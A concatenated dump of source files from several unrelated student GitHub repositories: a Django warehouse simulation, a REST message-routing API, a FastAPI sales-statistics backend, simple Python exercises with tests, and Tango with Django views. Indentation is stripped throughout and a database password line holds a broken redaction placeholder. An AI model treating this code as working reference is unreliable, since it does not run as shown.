final_pop_obs_qubits = pop_obs_qubits
print("Calculating Final Accuracy")
final_qubtis_accuracy, final_qubits_cross_val_score = quantum_diff_evol.pop_accuracy(final_pop_obs_qubits)
quantum_diff_evol.print_output(final_pop_qubits, final_pop_obs_qubits, final_qubits_cross_val_score)
if __name__ == "__main__":
elitist_quantum_diff_evol()
``` |
{
"source": "2021-SE-Lab-Mindstorm-Project/Smart-Warehouse-Cloud",
"score": 2
} |
#### File: warehouse_cloud/cloud/views.py
```python
from django.http import HttpResponse
from django.template import loader
def index(request):
template = loader.get_template('cloud/index.html')
return HttpResponse(template.render())
def data(request):
template = loader.get_template('cloud/data.html')
return HttpResponse(template.render())
def experiment(request):
template = loader.get_template('cloud/experiment.html')
return HttpResponse(template.render())
```
#### File: warehouse_cloud/cloud/warehouse.py
```python
from . import rl
from .models import Inventory, Order
class Warehouse:
def __init__(self, anomaly_aware):
# config
self.cap_conveyor = 5
self.cap_wait = 5
self.reward_order = 30
self.reward_trash = 70
self.reward_wait = 1
self.order_total = 20
self.order_delay = 0
self.anomaly_mtbf = 5
self.anomaly_duration = 10
self.anomaly_wait = 3
self.item_buy = 5
# Warehouse
self.tick = 0
self.anomaly_aware = anomaly_aware
try:
self.rl_model = rl.DQN(path='../model/rl.pth')
self.a_rl_models = [rl.DQN(path='../model/a_rl_0.pth'),
None,
rl.DQN(path='../model/a_rl_2.pth')]
except:
pass
self.c = [0] * 4
self.recent_c = 0
self.recent_s = 0
self.c_waiting = 0
self.c_allow = 3
self.r_allow = [False] * 3
self.s_allow = 3
self.r_wait = [0] * 3
self.s_wait = 0
self.stuck = [False] * 3
self.count = [0] * 3
self.current_anomaly = [-1] * 3
self.reward = 0
self.old_state = None
self.old_decision = None
self.old_reward = 0
def need_decision(self):
if sum(self.c) == 0:
return False
num_true = 0
for ans in self.available():
if ans:
num_true += 1
return num_true > 1
def available(self, i=None):
if i is not None:
inventory_objects = Inventory.objects.filter(stored=i)
ans = len(inventory_objects) < self.cap_conveyor
if not self.anomaly_aware:
return ans
return ans and self.current_anomaly[i] == -1
ans = []
for i in range(3):
inventory_objects = Inventory.objects.filter(stored=i)
single_ans = len(inventory_objects) < self.cap_conveyor
if not self.anomaly_aware:
ans.append(single_ans)
else:
ans.append(single_ans and self.current_anomaly[i] == -1)
return ans
def get_available(self):
available = self.available()
ans = []
for i, avail in enumerate(available):
if avail:
ans.append(i)
return ans
def get_inventory(self, item):
return self.c[item - 1] + len(Inventory.objects.filter(item_type=item, stored__lt=4))
def get_order(self, is_sum=True):
if is_sum:
return len(Order.objects.all())
orders = []
for i in range(4):
orders.append(len(Order.objects.filter(item_type=i + 1)))
return orders
def get_state(self):
def repr_list(conveyor):
ans = 0
for i, item in enumerate(conveyor):
ans += item.item_type * (5 ** (5 - i - 1))
return ans
ans = [self.tick, self.recent_c]
for i in range(4):
ans.append(repr_list(Inventory.objects.filter(stored=i)))
ans.extend(self.get_order(False))
return ans
def anomaly_state(self):
anomaly_number = 0
for i, anomaly in enumerate(self.current_anomaly):
if anomaly != -1:
anomaly_number += (2 ** i)
return anomaly_number
``` |
{
"source": "2021-SE-Lab-Mindstorm-Project/Smart-Warehouse-Repository-Edge",
"score": 2
} |
#### File: edge_repository/edge/api.py
```python
import datetime
import json
import requests
from drf_yasg.utils import swagger_auto_schema
from rest_framework import serializers, viewsets
from rest_framework.response import Response
from edge_repository.settings import settings
from . import models
from .models import Sensory, Inventory, Order, Message, Status
experiment_type = 'SAS'
shipment_capacity = 0
# Serializer
class SensoryListSerializer(serializers.ListSerializer):
def create(self, validated_data):
sensory_data_list = [Sensory(**item) for item in validated_data]
return Sensory.objects.bulk_create(sensory_data_list)
class SensorySerializer(serializers.ModelSerializer):
class Meta:
model = Sensory
fields = '__all__'
list_serializer_class = SensoryListSerializer
class MessageSerializer(serializers.ModelSerializer):
class Meta:
model = Message
fields = '__all__'
# Sensory Data
class SensoryViewSet(viewsets.ModelViewSet):
queryset = Sensory.objects.all()
serializer_class = SensorySerializer
http_method_names = ['post']
@swagger_auto_schema(responses={400: "Bad Request"})
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data, many=isinstance(request.data, list))
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, headers=headers)
class MessageViewSet(viewsets.ModelViewSet):
queryset = Message.objects.all()
serializer_class = MessageSerializer
http_method_names = ['post']
@swagger_auto_schema(responses={400: "Bad request", 204: "Invalid Message Title / Invalid Message Sender / Not allowed"})
def create(self, request, *args, **kwargs):
global shipment_capacity, experiment_type
super().create(request, *args, **kwargs)
sender = int(request.data['sender'])
title = request.data['title']
if sender == models.MACHINE_REPOSITORY_1 or sender == models.MACHINE_REPOSITORY_2 or sender == models.MACHINE_REPOSITORY_3:
if title == 'Running Check':
if len(Status.objects.all()) == 0:
return Response("Not allowed", status=204)
current_status = Status.objects.all()[0]
if current_status.status:
return Response(status=201)
return Response("Not allowed", status=204)
if title == 'Sending Check':
stored = sender - models.MACHINE_REPOSITORY_1
if experiment_type == 'SAS':
process_message = {'sender': models.EDGE_REPOSITORY,
'title': 'SAS Check',
'msg': stored}
response = requests.post(settings['cloud_address'] + '/api/message/', data=process_message)
if response.status_code == 204:
return Response("Not allowed", status=204)
shipment_capacity += 1
process_message = {'sender': models.EDGE_REPOSITORY,
'title': 'Order Processed',
'msg': stored}
requests.post(settings['edge_classification_address'] + '/api/message/', data=process_message)
requests.post(settings['cloud_address'] + '/api/message/', data=process_message)
return Response(status=201)
first_item = Inventory.objects.filter(stored=stored)[0]
target_orders = Order.objects.filter(item_type=first_item.item_type).order_by('made')
if shipment_capacity < settings['max_capacity_shipment']:
if len(target_orders) == 0:
return Response("Not allowed", status=204)
else:
target_order = target_orders[0]
target_order.delete()
shipment_capacity += 1
process_message = {'sender': models.EDGE_REPOSITORY,
'title': 'Order Processed',
'msg': stored}
requests.post(settings['edge_classification_address'] + '/api/message/', data=process_message)
requests.post(settings['cloud_address'] + '/api/message/', data=process_message)
return Response(status=201)
return Response("Not allowed", status=204)
if title == 'Anomaly Occurred':
location = sender - models.MACHINE_REPOSITORY_1
process_message = {'sender': models.EDGE_REPOSITORY,
'title': 'Anomaly Occurred',
'msg': location}
requests.post(settings['cloud_address'] + '/api/message/', data=process_message)
return Response(status=201)
if title == 'Anomaly Solved':
location = sender - models.MACHINE_REPOSITORY_1
process_message = {'sender': models.EDGE_REPOSITORY,
'title': 'Anomaly Solved',
'msg': location}
requests.post(settings['cloud_address'] + '/api/message/', data=process_message)
return Response(status=201)
return Response("Invalid Message Title", status=204)
if sender == models.EDGE_CLASSIFICATION:
if title == 'Classification Processed':
msg = json.loads(request.data['msg'])
item_type = int(msg['item_type'])
stored = int(msg['stored'])
# Modify Inventory DB
target_item = Inventory(item_type=item_type, stored=stored)
target_item.save()
return Response(status=201)
return Response("Invalid Message Title", status=204)
if sender == models.EDGE_SHIPMENT:
if title == 'Order Processed':
shipment_capacity -= 1
return Response(status=201)
return Response("Invalid Message Title", status=204)
if sender == models.CLOUD:
if title == 'Order Created':
order_data = json.loads(request.data['msg'])
new_order = Order(item_type=int(order_data['item_type']), made=order_data['made'])
new_order.save()
return Response(status=201)
if title == 'Start':
experiment_type = request.data['msg']
Inventory.objects.all().delete()
Order.objects.all().delete()
shipment_capacity = 0
if len(Status.objects.all()) == 0:
current_state = Status()
else:
current_state = Status.objects.all()[0]
current_state.status = True
current_state.save()
return Response(status=201)
if title == 'Stop':
if len(Status.objects.all()) == 0:
current_state = Status()
else:
current_state = Status.objects.all()[0]
current_state.status = False
current_state.save()
return Response(status=201)
return Response("Invalid Message Title", status=204)
return Response("Invalid Message Sender", status=204)
``` |
{
"source": "2021-SW-Project-contest/sw-sangcharim-be",
"score": 3
} |
#### File: sw-sangcharim-be/api/database.py
```python
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import os
# SQLALCHEMY_DATABASE_URL = "mariadb+mariadbconnector://{username}:{password}@{host}:{port}/{db_name}".format(
# host=os.getenv('DB_SCR_HOST'),
# username=os.getenv('DB_SCR_USERNAME'),
# password=<PASSWORD>('<PASSWORD>'),
# port=os.getenv('DB_SCR_PORT'),
# db_name=os.getenv('DB_SCR_DATABASE')
# )
SQLALCHEMY_DATABASE_URL = "postgresql://{username}:{password}@{host}:{port}/{db_name}".format(
host=os.getenv('DB_SCR_HOST'),
username=os.getenv('DB_SCR_USERNAME'),
password=<PASSWORD>('<PASSWORD>'),
port=os.getenv('DB_SCR_PORT'),
db_name=os.getenv('DB_SCR_DATABASE')
)
engine = create_engine(SQLALCHEMY_DATABASE_URL)
SessionLocal = sessionmaker(bind=engine, autocommit=False, autoflush=False)
Base = declarative_base()
def get_db():
db = SessionLocal()
try:
yield db
finally:
db.close()
```
#### File: api/routers/area_ro.py
```python
from typing import List
from fastapi import APIRouter, Depends
from sqlalchemy.orm import Session
from api import models
from api.schemas import area_sc
from api import database
router = APIRouter(
prefix="/area",
tags=["Area"],
responses={404: {"description": "Not found"}},
)
get_db = database.get_db
@router.get("", response_model=List[area_sc.AreaSchema])
def getArea(db: Session=Depends(get_db)):
"""
`완료`\n
`areaCategory` : 상권 대분류\n
`areaList` : 대분류내의 상권 리스트\n
`areaCode` : 세부 상권 코드\n
`areaName` : 세부 상권 이름\n
"""
areaList = db.query(models.Area).all()
areaCategoryList: list[str] = list(set([area.areaCategory for area in areaList]))
result: list[area_sc.AreaSchema] = [area_sc.AreaSchema(areaCategory=areaCategory, areaList=[]) for areaCategory in areaCategoryList]
for area in areaList:
index = areaCategoryList.index(area.areaCategory)
result[index].areaList.append(area_sc.Area(
areaCode=area.areaCode,
areaName=area.areaName,
))
return result
```
#### File: api/routers/detail_ro.py
```python
from typing import List, Optional
from fastapi import APIRouter, Depends, HTTPException, status
from sqlalchemy.orm import Session
import math
from api import database
from api import models
from api.schemas import detail_sc, area_sc
router = APIRouter(
prefix="/detail",
tags=["Detail"],
responses={404: {"description": "Not found"}},
)
get_db = database.get_db
@router.get("/", response_model=detail_sc.DetailSchema)
def getDetail(areaCode: int, businessCode1: Optional[int]=None, businessCode2: Optional[int]=None, businessCode3: Optional[int]=None, db: Session=Depends(get_db)):
"""
`완료`\n
`area` : 선택한 상권 정보\n
`areaCode` : 상권 코드\n
`areaName` : 상권 이름\n
`businessList` : 가게 정보\n
`businessCode` : 업종 코드\n
`businessName` : 업종 이름\n
`businessCount` : 상권내 해당 업종의 수\n
-> businessCode1~3가 None이면 : 상권내의 가장 많은 업종 best3\n
-> businessCode1~3에 값이 있으면 : 상권내의 선택한 업종 수
"""
area = db.query(models.Area).filter(models.Area.areaCode == areaCode).first()
if not area:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail="해당 상권을 찾을 수 없습니다."
)
result = []
storeList = db.query(models.Store).filter(models.Store.areaCode == areaCode)
if not (businessCode1 or businessCode2 or businessCode3):
# best3 뽑기
storeDict: dict = {}
for store in storeList.all():
if store.businessCode in storeDict.keys():
storeDict[store.businessCode] += 1
else:
storeDict[store.businessCode] = 1
for bestKey in sorted(storeDict, key=storeDict.get, reverse=True)[:3]:
result.append(
detail_sc.DetailBusiness(
businessCode = bestKey,
businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == bestKey).first().businessName,
businessCount = storeDict[bestKey]
)
)
else:
# 선택한 애들의 수 뽑기
for businessCode in (businessCode1, businessCode2, businessCode3):
if businessCode:
result.append(
detail_sc.DetailBusiness(
businessCode = businessCode,
businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == businessCode).first().businessName,
businessCount = storeList.filter(models.Store.businessCode == businessCode).count()
)
)
return detail_sc.DetailSchema(
area = area_sc.Area(
areaCode = area.areaCode,
areaName = area.areaName,
),
businessList = result
)
@router.get("/sales", response_model=detail_sc.SalesSchema)
def getSales(areaCode: int, businessCode1: Optional[int]=None, businessCode2: Optional[int]=None, businessCode3: Optional[int]=None, db: Session=Depends(get_db)):
"""
`완료`\n
`area` : 선택한 상권 정보\n
`sales` : 상권의 매출 최소, 최대, 평균\n
`day` : 상권의 요일별 평균 매출비율\n
`time` : 상권의 시간대별 평균 매출비율\n
_**(deprecated)** `businessList` : 선택한 업종의 정보_\n
_**(deprecated)** `businessSale` : 업종 매출액_\n
_**(deprecated)** `businessDay` : 업종의 요일별 매출비율_\n
_**(deprecated)** `businessTime` : 업종의 시간대별 매출비율_\n
-> businessCode1~3가 None이면 : []\n
-> businessCode1~3에 값이 있으면 : 만약 해당 상권에 해당 업종이 없으면 추가 되지 않음.
"""
# 상권
area = db.query(models.Area).filter(models.Area.areaCode == areaCode).first()
if not area:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail="해당 상권을 찾을 수 없습니다."
)
# 최소, 최대, 평균 매출
sales = db.query(models.Sales).filter(models.Sales.areaCode == areaCode)
amountList = [sale.amount for sale in sales.all()]
resultSales = detail_sc.Sales(
min = min(amountList),
max = max(amountList),
avg = sum(amountList) / len(amountList),
)
# 요일별 매출
salesIdList = [sale.id for sale in sales.all()]
salesIdListCount = len(salesIdList)
daySales = db.query(models.DaySales).filter(models.DaySales.salesId.in_(salesIdList)).all()
resultDaySales = detail_sc.Day()
for sale in daySales:
resultDaySales.mon += sale.mondayRatio
resultDaySales.tue += sale.tuesdayRatio
resultDaySales.wed += sale.wednesdayRatio
resultDaySales.thu += sale.thursdayRatio
resultDaySales.fri += sale.fridayRatio
resultDaySales.sat += sale.saturdayRatio
resultDaySales.sun += sale.sundayRatio
resultDaySales.mon = round(resultDaySales.mon / salesIdListCount)
resultDaySales.tue = round(resultDaySales.tue / salesIdListCount)
resultDaySales.wed = round(resultDaySales.wed / salesIdListCount)
resultDaySales.thu = round(resultDaySales.thu / salesIdListCount)
resultDaySales.fri = round(resultDaySales.fri / salesIdListCount)
resultDaySales.sat = round(resultDaySales.sat / salesIdListCount)
resultDaySales.sun = round(resultDaySales.sun / salesIdListCount)
# 시간대별 매출
timeSales = db.query(models.TimeSales).filter(models.TimeSales.salesId.in_(salesIdList)).all()
resultTimeSales = detail_sc.Time()
for sale in timeSales:
resultTimeSales.time0006 += sale.time0006
resultTimeSales.time0611 += sale.time0611
resultTimeSales.time1114 += sale.time1114
resultTimeSales.time1417 += sale.time1417
resultTimeSales.time1721 += sale.time1721
resultTimeSales.time2124 += sale.time2124
resultTimeSales.time0006 = round(resultTimeSales.time0006 / salesIdListCount)
resultTimeSales.time0611 = round(resultTimeSales.time0611 / salesIdListCount)
resultTimeSales.time1114 = round(resultTimeSales.time1114 / salesIdListCount)
resultTimeSales.time1417 = round(resultTimeSales.time1417 / salesIdListCount)
resultTimeSales.time1721 = round(resultTimeSales.time1721 / salesIdListCount)
resultTimeSales.time2124 = round(resultTimeSales.time2124 / salesIdListCount)
# 선택한 업종의
resultBusinessList: list[detail_sc.SalesBusiness] = []
if businessCode1 or businessCode2 or businessCode3:
for businessCode in (businessCode1, businessCode2, businessCode3):
if businessCode:
targetSales = sales.filter(models.Sales.businessCode == businessCode).first()
if not targetSales:
continue
targetDay = db.query(models.DaySales).filter(models.DaySales.id == targetSales.id).first()
targetTime = db.query(models.TimeSales).filter(models.TimeSales.salesId == targetSales.id).first()
resultBusinessList.append(
detail_sc.SalesBusiness(
businessCode = businessCode,
businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == businessCode).first().businessName,
businessSale = targetSales.amount,
businessDay = detail_sc.Day(
mon = targetDay.mondayRatio,
tue = targetDay.tuesdayRatio,
wed = targetDay.wednesdayRatio,
thu = targetDay.thursdayRatio,
fri = targetDay.fridayRatio,
sat = targetDay.saturdayRatio,
sun = targetDay.sundayRatio,
),
businessTime = detail_sc.Time(
time0006 = targetTime.time0006,
time0611 = targetTime.time0611,
time1114 = targetTime.time1114,
time1417 = targetTime.time1417,
time1721 = targetTime.time1721,
time2124 = targetTime.time2124,
)
)
)
# 리스트 구한 업종들의 전체 비율
listLength = len(resultBusinessList)
resultSales = detail_sc.Sales(
min = min(map(lambda x:x.businessSale, resultBusinessList)),
max = max(map(lambda x:x.businessSale, resultBusinessList)),
avg = round(sum(map(lambda x:x.businessSale, resultBusinessList)) / listLength)
)
resultDaySales = detail_sc.Day(
mon = round(sum(map(lambda x: x.businessDay.mon, resultBusinessList)) / listLength),
tue = round(sum(map(lambda x: x.businessDay.tue, resultBusinessList)) / listLength),
wed = round(sum(map(lambda x: x.businessDay.wed, resultBusinessList)) / listLength),
thu = round(sum(map(lambda x: x.businessDay.thu, resultBusinessList)) / listLength),
fri = round(sum(map(lambda x: x.businessDay.fri, resultBusinessList)) / listLength),
sat = round(sum(map(lambda x: x.businessDay.sat, resultBusinessList)) / listLength),
sun = round(sum(map(lambda x: x.businessDay.sun, resultBusinessList)) / listLength),
)
resultTimeSales = detail_sc.Time(
time0006 = round(sum(map(lambda x: x.businessTime.time0006, resultBusinessList)) / listLength),
time0611 = round(sum(map(lambda x: x.businessTime.time0611, resultBusinessList)) / listLength),
time1114 = round(sum(map(lambda x: x.businessTime.time1114, resultBusinessList)) / listLength),
time1417 = round(sum(map(lambda x: x.businessTime.time1417, resultBusinessList)) / listLength),
time1721 = round(sum(map(lambda x: x.businessTime.time1721, resultBusinessList)) / listLength),
time2124 = round(sum(map(lambda x: x.businessTime.time2124, resultBusinessList)) / listLength),
)
return detail_sc.SalesSchema(
area = area_sc.Area(
areaCode = area.areaCode,
areaName = area.areaName,
),
sales = resultSales,
day = resultDaySales,
time = resultTimeSales,
# businessList = resultBusinessList
)
@router.get("/customer", response_model=detail_sc.CustomerSchema)
def getCustomer(areaCode: int, businessCode1: Optional[int]=None, businessCode2: Optional[int]=None, businessCode3: Optional[int]=None, db: Session=Depends(get_db)):
"""
`완료`\n
`area` : 선택한 상권 정보\n
`genderRatio` : 선택한 상권의 매출 성비\n
`ageRatio` : 선택한 상권의 연령별 매출\n
_**(deprecated)** `businessList` : 선택한 업종의 정보_\n
"""
area = db.query(models.Area).filter(models.Area.areaCode == areaCode).first()
resultCustomerList: list[detail_sc.CustomerBusiness] = []
sales = db.query(models.Sales).filter(models.Sales.areaCode == areaCode)
salesIdList = []
for sale in sales:
salesIdList.append(sale.id)
customers = db.query(models.CustomerSales).filter(models.CustomerSales.salesId.in_(salesIdList))
# 선택 업종이 없는 경우
# 남여 비율 계산하기
man_sum = woman_sum = 0
for customer in customers:
man_sum += customer.man
woman_sum += customer.woman
man_ratio = round(man_sum/len(salesIdList) * (100/((man_sum/len(salesIdList)) + woman_sum/len(salesIdList))))
woman_ratio = round(woman_sum/len(salesIdList) * (100/((man_sum/len(salesIdList)) + woman_sum/len(salesIdList))))
# 나이대별 비율 계산하기
age_sum_list = []
age10_sum = age20_sum = age30_sum = age40_sum = age50_sum = age60_sum = 0
for customer in customers:
age10_sum += customer.age10
age20_sum += customer.age20
age30_sum += customer.age30
age40_sum += customer.age40
age50_sum += customer.age50
age60_sum += customer.age60
age_sum_list.extend([age10_sum, age20_sum, age30_sum, age40_sum, age50_sum, age60_sum])
age_ratio = []
for age in age_sum_list:
ratio = (age/len(salesIdList)) * (100/(sum(age_sum_list)/len(salesIdList)))
age_ratio.append(round(ratio))
age10_ratio = age_ratio[0]
age20_ratio = age_ratio[1]
age30_ratio = age_ratio[2]
age40_ratio = age_ratio[3]
age50_ratio = age_ratio[4]
age60_ratio = age_ratio[5]
# 선택 업종이 있는 경우
if businessCode1 or businessCode2 or businessCode3:
for businessCode in (businessCode1, businessCode2, businessCode3):
if not businessCode:
continue
try:
targetSales = sales.filter(models.Sales.businessCode == businessCode).first()
targetCustomer = db.query(models.CustomerSales).filter(models.CustomerSales.id == targetSales.id).first()
# 업종 남녀비율 계산
man_ratio1 = targetCustomer.man * (100/(targetCustomer.man + targetCustomer.woman))
woman_ratio1 = targetCustomer.woman * (100/(targetCustomer.man + targetCustomer.woman))
# 업종 나이대별 비율 계산
age_sum = targetCustomer.age10 + targetCustomer.age20 + targetCustomer.age30 + targetCustomer.age40 + targetCustomer.age50 + targetCustomer.age60
age10_ratio1 = targetCustomer.age10 * (100/age_sum)
age20_ratio1 = targetCustomer.age20 * (100/age_sum)
age30_ratio1 = targetCustomer.age30 * (100/age_sum)
age40_ratio1 = targetCustomer.age40 * (100/age_sum)
age50_ratio1 = targetCustomer.age50 * (100/age_sum)
age60_ratio1 = targetCustomer.age60 * (100/age_sum)
resultCustomerList.append(
detail_sc.CustomerBusiness(
businessCode = businessCode,
businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == businessCode).first().businessName,
businessGender = detail_sc.CustomerGenderRatio(
male = round(man_ratio1),
female = round(woman_ratio1)
),
businessAge = detail_sc.CustomerAgeRatio(
age10 = round(age10_ratio1),
age20 = round(age20_ratio1),
age30 = round(age30_ratio1),
age40 = round(age40_ratio1),
age50 = round(age50_ratio1),
age60 = round(age60_ratio1)
)
)
)
except:
continue
# 리스트 구한 업종들의 전체 비율
listLength = len(resultCustomerList)
man_ratio = sum(map(lambda x: x.businessGender.male, resultCustomerList)) / listLength
woman_ratio = sum(map(lambda x: x.businessGender.female, resultCustomerList)) / listLength
age10_ratio = sum(map(lambda x: x.businessAge.age10, resultCustomerList)) / listLength
age20_ratio = sum(map(lambda x: x.businessAge.age20, resultCustomerList)) / listLength
age30_ratio = sum(map(lambda x: x.businessAge.age30, resultCustomerList)) / listLength
age40_ratio = sum(map(lambda x: x.businessAge.age40, resultCustomerList)) / listLength
age50_ratio = sum(map(lambda x: x.businessAge.age50, resultCustomerList)) / listLength
age60_ratio = sum(map(lambda x: x.businessAge.age60, resultCustomerList)) / listLength
return detail_sc.CustomerSchema(
area = area_sc.Area(
areaCode = area.areaCode,
areaName = area.areaName,
),
genderRatio = detail_sc.CustomerGenderRatio(
male = man_ratio,
female = woman_ratio
),
ageRatio = detail_sc.CustomerAgeRatio(
age10 = age10_ratio,
age20 = age20_ratio,
age30 = age30_ratio,
age40 = age40_ratio,
age50 = age50_ratio,
age60 = age60_ratio
),
# business = resultCustomerList
)
@router.get("/future", response_model=detail_sc.FutureSchema)
def getFuture(areaCode: int, businessCode1: Optional[int]=None, businessCode2: Optional[int]=None, businessCode3: Optional[int]=None, db: Session=Depends(get_db)):
"""
`완료`\n
`area` : 선택한 상권 정보\n
`areaSituation` : 선택한 상권의 전망 **(정체, 상권축소, 상권확장, 다이나믹)**\n
`areaClosure` : 선택한 상권의 폐업률\n
_**(deprecated)** `business` : 선택한 업종의 정보_\n
"""
situationStr = { 1: "정체", 2: "상권축소", 3: "상권확장", 4: "다이나믹" }
area = db.query(models.Area).filter(models.Area.areaCode == areaCode).first()
resultFutureList: list[detail_sc.FutureBusiness] = []
# 선택 업종이 없는 경우
# 상권내 전체 점포 폐업률의 합/전체 점포의 수
change_sum = change_cnt = 0
changeList = db.query(models.Change).filter(models.Change.areaCode == areaCode)
for change in changeList:
change_sum += change.closure
change_cnt += 1
area_closure = int(change_sum / change_cnt)
# 선택 업종이 있는 경우
if businessCode1 or businessCode2 or businessCode3:
for businessCode in (businessCode1, businessCode2, businessCode3):
if not businessCode:
continue
targetClosure = db.query(models.Change).filter(models.Change.areaCode == areaCode) \
.filter(models.Change.businessCode == businessCode).first()
try:
resultFutureList.append(
detail_sc.FutureBusiness(
businessCode = businessCode,
businessName = db.query(models.Businesss).filter(models.Businesss.businessCode == businessCode).first().businessName,
businessClosure = targetClosure.closure
)
)
except:
continue
# 리스트 구한 업종들의 전체 비율
area_closure = sum(map(lambda x: x.businessClosure, resultFutureList)) / len(resultFutureList)
return detail_sc.FutureSchema(
area = area_sc.Area(
areaCode = area.areaCode,
areaName = area.areaName,
),
areaSituation = situationStr[area.status],
areaClosure = area_closure,
# business = resultFutureList
)
``` |
{
"source": "2022AC12SDD/Aurora_SDD_Template",
"score": 3
} |
#### File: 2022AC12SDD/Aurora_SDD_Template/test_helpers.py
```python
import pytest
import helpers as h
def test_ultimate_answer():
question1 = 'What is the meaning of Life, The Universe, Everything?'
assert h.ultimate_answer(question1) == '42'
question2 = 'What is 6 x 7'
assert h.ultimate_answer(question2) == 'That is not much of a question'
``` |
{
"source": "2022AC12SDD/control-structures-dvorakman",
"score": 4
} |
#### File: 2022AC12SDD/control-structures-dvorakman/helpers.py
```python
def ultimate_answer(question):
"""Provides an answer to the ultimate question.
Returns '42' if the question is 'What is the meaning of Life, The Universe,
Everything?' otherwise returns 'That is not much of a question'
args:
question (str): The question to be answered.
returns:
str
"""
if question == "What is the meaning of Life, The Universe, Everything?":
answer = "42"
else:
answer = "That is not much of a question"
return answer
## binary selection ##
def check_guess_bin(guess, target):
"""Checks a guess to see if it is the same as the target.
Complete this function using binary selection
Args:
guess: int - the guessed number
target: int - the correct or target number
Returns:
winner: bool - True if correct guess otherwise false
"""
if guess == target:
return True
else:
return False
## multiway selection
def check_guess_multi(guess, target):
"""Checks a guess to see if it is the same as the target.
If the guess is incorrect, prompts the player to guess higher
or lower as appropriate.
Complete this function using multi-way selection
Args:
guess: int - the guessed number
target: int - the correct or target number
Returns:
prompt: str - "higher", "lower" or "correct"
"""
while guess != target:
if guess > target:
guess = int(input("Lower: "))
else:
guess = int(input("Higher: "))
print("Correct")
## pre-test repetition
def factorial(num):
"""Calculates the factorial of a number.
Use pre-test repetition to write a function that computes the factorial of a number.
A factorial of a number is the product of all the positive integers
less than it.
For example 4 factorial is 4 x 3 x 2 x 1 = 24
Args:
num: int - the number for which to calculate the factorial
Returns:
fact: the factorial of num
"""
iteration = 0
fact = 1
while iteration < num:
for i in range(1,num+1):
iteration = iteration + 1
fact = fact * i
return fact
## counted repetition
def add_array(in_array):
"""Adds the elements of an array.
Use counted repetition, using a start, finish and a step, to sum the
elements of an array
Args:
in_array: array if numbers to be added
Returns:
sum: the sum of the array
"""
sum = 0
for i in range(0, len(in_array)):
sum = sum + in_array[i]
return sum
``` |
{
"source": "2022-capstone-design-KPUCS/capstone-drone-backend",
"score": 2
} |
#### File: drone-wrapper/stats/serializers.py
```python
from rest_framework import serializers
from .models import Flight, Deck, Drone, FlightRecord
class DeckSerializer(serializers.ModelSerializer):
def create(self, validated_data):
return Deck.objects.create(**validated_data)
class Meta:
model = Deck
fields = '__all__'
class FlightRecordSerializer(serializers.ModelSerializer):
def create(self, validated_data):
return FlightRecord.objects.create(**validated_data)
class Meta:
model = FlightRecord
fields = '__all__'
class FlightSerializer(serializers.ModelSerializer):
def create(self, validated_data):
flight = Flight.objects.create(**validated_data)
Drone.objects.update(flight=flight.id)
return flight
class Meta:
model = Flight
fields = '__all__'
class DroneSerializer(serializers.ModelSerializer):
class Meta:
model = Drone
fields = '__all__'
def create(self, validated_data):
drone_alias = validated_data['drone_alias'].lower()
deck_name = "".join([drone_alias, '-deck'])
Deck.objects.create(deck_name=deck_name, is_occupied=False)
validated_data['deck'] = Deck.objects.get(deck_name=deck_name)
validated_data['admin'] = self.context['request'].user
drone = Drone.objects.create(**validated_data)
return drone
``` |
{
"source": "2022-Spring-NYU-DevOps-Shopcarts/shopcarts",
"score": 3
} |
#### File: features/steps/shopcarts_steps.py
```python
import json
import requests
from behave import given
from compare import expect
@given('a set of items in shopcarts')
def step_impl(context):
""" Delete all Shopcarts and load new ones """
headers = {'Content-Type': 'application/json'}
# list all of the shopcarts and delete them one by one
context.resp = requests.get(context.base_url + '/shopcarts')
expect(context.resp.status_code).to_equal(200)
for shopcart in context.resp.json():
context.resp = requests.delete(context.base_url + '/shopcarts/' + str(shopcart["user_id"]), headers=headers)
expect(context.resp.status_code).to_equal(204)
# load the database with new shopcarts
create_url = context.base_url + '/shopcarts'
for row in context.table:
data = {
"item_id": int(row['item_id']),
"item_name": row['item_name'],
"quantity": int(row['quantity']),
"price": float(row['price']),
"hold": bool(row['hold'] in ['True', 'true', '1'])
}
payload = json.dumps(data)
context.resp = requests.post(create_url+"/"+row['user_id']+"/items", data=payload, headers=headers)
expect(context.resp.status_code).to_equal(201)
``` |
{
"source": "2027205T/tangowithdjango",
"score": 2
} |
#### File: tango_with_django_project/rango/views.py
```python
from django.shortcuts import render
from rango.models import Category
from rango.models import Page
from rango.models import User
from rango.forms import CategoryForm
from rango.forms import PageForm
from rango.forms import UserForm, UserProfileForm
from django.contrib.auth import authenticate, login
from django.http import HttpResponseRedirect, HttpResponse
from django.contrib.auth.decorators import login_required
from django.contrib.auth import logout
from datetime import datetime
from rango.bing_search import run_query
from django.shortcuts import redirect
@login_required
def restricted(request):
# Take the user back to the homepage.
return HttpResponseRedirect('/rango/restricted.html')
def manageCookies(request, context_dict):
visits = request.session.get('visits')
if not visits:
visits = 1
reset_last_visit_time = False
last_visit = request.session.get('last_visit')
if last_visit:
last_visit_time = datetime.strptime(last_visit[:-7], "%Y-%m-%d %H:%M:%S")
if (datetime.now() - last_visit_time).seconds > 0:
# ...reassign the value of the cookie to +1 of what it was before...
visits = visits + 1
# ...and update the last visit cookie, too.
reset_last_visit_time = True
else:
# Cookie last_visit doesn't exist, so create it to the current date/time.
reset_last_visit_time = True
if reset_last_visit_time:
request.session['last_visit'] = str(datetime.now())
request.session['visits'] = visits
context_dict['visits'] = visits
return context_dict
def index(request):
category_list = Category.objects.order_by('-likes')[:5]
page_list = Page.objects.order_by('-views')[:5]
context_dict = {'categories': category_list, 'pages': page_list}
context_dict = manageCookies(request, context_dict)
response = render(request,'rango/index.html', context_dict)
return response
def about(request):
# Construct a dictionary to pass to the template engine as its context.
# Note the key boldmessage is the same as {{ boldmessage }} in the template!
context_dict = {'boldmessage': "sorry :)"}
# If the visits session varible exists, take it and use it.
# If it doesn't, we haven't visited the site so set the count to zero.
if request.session.get('visits'):
context_dict['visits'] = request.session.get('visits')
else:
context_dict['visits'] = 0
# Return a rendered response to send to the client.
